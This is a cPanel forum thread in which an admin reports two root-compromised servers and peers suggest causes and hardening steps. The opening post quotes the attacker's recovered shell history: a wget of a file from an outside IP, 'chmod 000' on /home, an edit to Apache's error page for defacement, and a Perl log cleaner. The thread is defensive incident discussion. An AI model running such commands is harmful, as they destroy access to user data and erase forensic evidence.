The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Got 2 Cpanel Servers hacked... root gained, anyone know HOW they did?

Discussion in 'Security' started by cass, Jul 6, 2011.

  1. cass

    cass Well-Known Member

    Joined:
    Jul 17, 2002
    Messages:
    354
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Argentina/USA/Mexico
    On two completly different cpanel servers, the same hacker or team gained access... (from morocco)
    Anyone had an idea how can this be possible?
    The two servers were up2date (cpanel and OS), one of it had CSF/LFD (5.32) as well as hardened in many ways, the other doesn´t had CSF, but was running suPHP.
    In both the SSH was running on non standard ports.

    We already saw more than one with the same issue....
    they basically... chmod 000 /home, and edit /usr/local/apache/conf/includes/errordocument.conf the 403 line, to show an hacked html, that is shown on all websites running on the server. Then they run a "log cleaner".

    First I thought it could be the CSF bug ... but one of the server doesn´t had it, and the other had it updated already...
    We were looking around, and found the attacker IP (41.140.*) was like logged on the whm (per apache logs)...
    but we can´t still determine HOW they got the root access.... both servers were updated, and running smooth since the beggining... so we´re afraid it could be a BUG that could affect other clients too.
    I´m not telling it´s a cpanel bug... I´m trying to find someone that could actually KNOW what they did, as most logs/history was deleted on this server, we found
    Part of the History (as we logged in fast to the server, before they leave) was this:
    14 cd /tmp
    15 w
    16 wget 41.140.110.54/log
    17 pico /usr/local/apache/conf/includes/errordocument.conf
    18 service httpd restart
    19 ls -la /
    20 chmod 000 /homechmod 000 /home
    21 chmod 000 /home
    22 chmod 000 /homechmod 000 /home2
    23 chmod 000 /home2
    24 perl log
    25 perl log
    (this last command is the one that clear logs, and they just gone)
    But could see they got the file, what file they edited, etc.
    looks like this is the only damage done, but if this is bug, they can actually do anything they want, as they were working as ROOT!

    BTW similar problem found recently here:
    https://forums.cpanel.net/f5/hacking-attempt-problem-help-210052.html
     
  2. k-planethost

    k-planethost Well-Known Member

    Joined:
    Sep 22, 2009
    Messages:
    199
    Likes Received:
    4
    Trophy Points:
    18
    Location:
    Athens Greece
    i suggest you hire a server admin for an hour or more to investigate further your issue.
    Answering from this forum how they gain root access is difficult without logs
    Recompiled Kernel, Secured /tmp & /dev/shm install mod sec with got root rules, firewall , disable functions on php, recompile php with suhosin,there are various of security methods to implement on your boxes.
     
  3. BigLebowski

    BigLebowski Well-Known Member

    Joined:
    Dec 24, 2007
    Messages:
    75
    Likes Received:
    0
    Trophy Points:
    6
    Were the kernels fully patched? There have been several root vulnerabilities over the years. I've seen lots of boxes plundered that way. Also did you have brute force checking on ? If you look at the logs you will normally see thousands of passwords tried over several days if CSF is not enabled and blocking.

    Dude
     
  4. cass

    cass Well-Known Member

    Joined:
    Jul 17, 2002
    Messages:
    354
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Argentina/USA/Mexico
    Yes brute force enabled (both csf and cpanel) also mod security.
    kernel not patched (last centos kernel installed).
     
  5. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    14,468
    Likes Received:
    196
    Trophy Points:
    63
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Twitter:
    Assuming you have CSF set to stop and block failed logins after 5 attempts, and you have no record of failed attempts (or do you?) then we might want to consider the user with root password to that server might have some sort of issue locally. This sort of thing does happen where a users computer is compromised somehow and passwords pulled from plain txt files where passwords may be stored for FTP clients. For example filezilla.

    There was a very long thread on this topic a while back on these forums that discussed this sort of thing.
     
Loading...

Share This Page